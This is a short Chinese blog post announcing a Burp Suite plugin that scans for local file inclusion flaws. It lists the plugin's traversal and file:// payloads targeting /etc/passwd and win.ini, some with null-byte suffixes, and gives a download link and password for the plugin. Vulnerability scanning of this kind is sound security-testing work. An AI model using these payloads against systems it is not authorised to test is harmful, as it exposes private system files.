Burp国产插件LFI scanner checks
LFI scanner checks是为了笔者为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的。
截图:
来对比下J2EESCAN里面附带的LFI探测
下面是安装上 LFI scanner checks
我使用的payload如下
../../../../../../../../../../../../../../../../etc/passwd%00.html
../../../../../../../../../../../../../../../../etc/passwd
file:///etc/passwd
file:///c:/windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini%00.html
下载地址链接: http://pan.baidu.com/s/1gdfITIN 密码: 4fv7
提示:请自行检测程序安全性
下一篇:DRBD磁盘镜像技术详细配置
相关文章
- 3条评论
- 只酷空枝2022-05-28 09:03:13
- LFI scanner checks是为了笔者为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的。截图:来对比下J2EESCAN里面附带的LF
- 忿咬旧谈2022-05-28 08:47:47
- LFI scanner checks是为了笔者为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的。截图:来对比下J2EESCAN里面附带的LFI探测 下面是安装上 LFI scanner checks我使用的
- 弦久晚鲸2022-05-28 11:59:56
- ../../../../../../../../../../../windows/win.ini%00.html下载地址链接: http://pan.baidu.com/s/1gdfITIN